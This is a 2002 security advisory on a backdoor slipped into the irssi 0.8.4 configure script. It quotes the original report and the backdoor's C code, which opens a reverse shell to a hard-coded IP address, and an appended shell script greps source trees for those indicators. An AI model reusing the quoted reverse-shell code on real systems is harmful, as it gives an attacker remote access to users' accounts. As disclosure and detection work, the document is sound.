IRSSI IRC Client for UNIX May Contain a Backdoor in a Certain Version of the Source Code Distribution
SecurityTracker Alert ID: 1004374

CVE Reference: GENERIC-MAP-NOMATCH

Date: May 25 2002

Impact: Root access via network, User access via network

Fix Available: Yes
Vendor Confirmed: Yes

Version(s): 0.8.4

Description: The vendor reported that an unknown user has placed a backdoor in the IRSSI IRC client 0.8.4 source code distribution. The system may connect to a certain IP host and provide that host with remote shell access.

It is reported that someone inserted a remote backdoor in the IRSSI configure script, possibly as early as 2002-04-19. Users that have installed version 0.8.4 from the source code distribution (but not from the binary) on or after that date may be affected.

The malicious code is located in the configure script. The code reportedly forks a new process, connects to some server, and gives stdin/out/err to the server. This gives the server remote access to the system with the privileges of the user installing the IRSSI script.

The vendor reports that if you installed the IRSSI binary, you are not affected. Also, the Debian sources are not affected. The CVS version and nightly snapshots appear to be unaffected. The vendor notes that if you let IRSSI download the GLib sources from irssi.org, those sources contain the backdoor.

To determine if you are vulnerable, if you still have the sources, you can run 'grep SOCK_STREAM configure'. This command should not return any lines.

Impact: A remote user on a specific IP host may be able to gain remote access to the system. The remote shell that the backdoor provides will have the privileges of the user that installed IRSSI using the configure script.

Solution: The vendor has reissued version 0.8.4, available at:
http://main.irssi.org/?page=download

Vendor URL: main.irssi.org/?page=backdoor

Cause: Configuration error

Underlying OS: Linux (Any), UNIX (Any)

Reported By: Martin Östlund <martin@webtech.se>

Message History:
None.

Source Message Contents

Date: Sat, 25 May 2002 16:58:05 +0200
From: Martin Östlund <martin@webtech.se>
Subject: irssi backdoored.

Hi readers.
I just discovered this on the irssi homepage (irssi is a new, popular
IRC chat client for those who didn't know).
"Just noticed, not sure for how long it's been there. I heard the first
change in the irssi-0.8.4.tar.gz's checksum was 2002/04/19. Guess I'll
have to start watching those myself from now on.. I'm moving the
main.irssi.org elsewhere for now, mirrors should pick up the DNS change
and update themselves automatically..
This code was found from configure - it forks a new process, connects to
some server and gives stdin/out/err to it (ie. giving remote access to
your account):
int s;
struct sockaddr_in sa;
switch(fork()) { case 0: break; default: exit(0); }
if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
exit(1);
}
/* HP/UX 9 (%@#!) writes to sscanf strings */
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("204.120.36.206");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
exit(1);
}
dup2(s, 0); dup2(s, 1); dup2(s, 2);
Also the IP just changed yesterday from 209.164.15.215. If you still
have the irssi sources, you can see if you're affected with grep
SOCK_STREAM configure - if it returns anything, something might have
been done to your system."
- End of quote.
Take care,
Martin Östlund.
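As an added example (not part of the alert and not irssi's own tooling), the shell script below wraps the vendor's check, 'grep SOCK_STREAM configure', in a reusable function and widens it to the other strings that appear in the code quoted above, so a source tree can be screened before configure is ever executed. It exercises the check against two constructed sample files: a clean autoconf-style fragment and the same fragment with the quoted socket lines appended. The function names, the sample contents and the placeholder address 192.0.2.1 are assumptions made for this example.

```shell
#!/bin/sh
# Added example; not code from the SecurityTracker alert or from the irssi
# project. It wraps the vendor's check ("grep SOCK_STREAM configure") in a
# function and widens it to the other strings that appear in the code
# quoted in the alert. A genuine autoconf-generated configure script has no
# business creating sockets, so any hit is worth a look before running it.

# check_configure FILE
#   exit status 0: no indicator found
#   exit status 1: one or more indicators found (treat the tree as tampered)
#   exit status 2: FILE does not exist
check_configure() {
    f="$1"
    if [ ! -f "$f" ]; then
        echo "check_configure: no such file: $f" >&2
        return 2
    fi
    hits=0
    # Indicators taken from the code quoted in the alert: the socket
    # creation, the hard-coded address, the port, and the dup2() calls that
    # hand stdin/stdout/stderr to the remote side.
    for pat in 'SOCK_STREAM' 'inet_addr(' 'htons(' 'dup2('; do
        if grep -n -F -- "$pat" "$f"; then
            hits=$((hits + 1))
        fi
    done
    if [ "$hits" -gt 0 ]; then
        echo "WARNING: $f matched $hits indicator(s); do not run this configure script" >&2
        return 1
    fi
    echo "$f: no indicators found"
    return 0
}

# The two samples below are constructed for this example; they are not real
# irssi configure scripts.

# write_clean_sample FILE: a few lines in the style of an autoconf script.
write_clean_sample() {
    cat > "$1" <<'EOF'
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
ac_help=
ac_default_prefix=/usr/local
test -n "$CC" || CC=gcc
echo "checking for glib" >&6
EOF
}

# write_tampered_sample FILE: the clean script plus the socket/dup2 lines
# quoted in the alert, with the address replaced by a placeholder.
write_tampered_sample() {
    write_clean_sample "$1"
    cat >> "$1" <<'EOF'
if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("192.0.2.1");  /* placeholder address */
dup2(s, 0); dup2(s, 1); dup2(s, 2);
EOF
}

# Usage: sh check_irssi_configure.sh path/to/irssi-0.8.4/configure [...]
# With no arguments the script only defines the functions above.
status=0
for f in "$@"; do
    check_configure "$f" || status=$?
done
[ $# -eq 0 ] || exit "$status"
```

A non-zero exit status means the unpacked tree should be discarded and re-fetched from the vendor. The check is string-based, so it finds the variant the alert describes and not a rewritten one; comparing the tarball's checksum against the value the vendor publishes, which the alert notes first changed on 2002/04/19, is the complementary check.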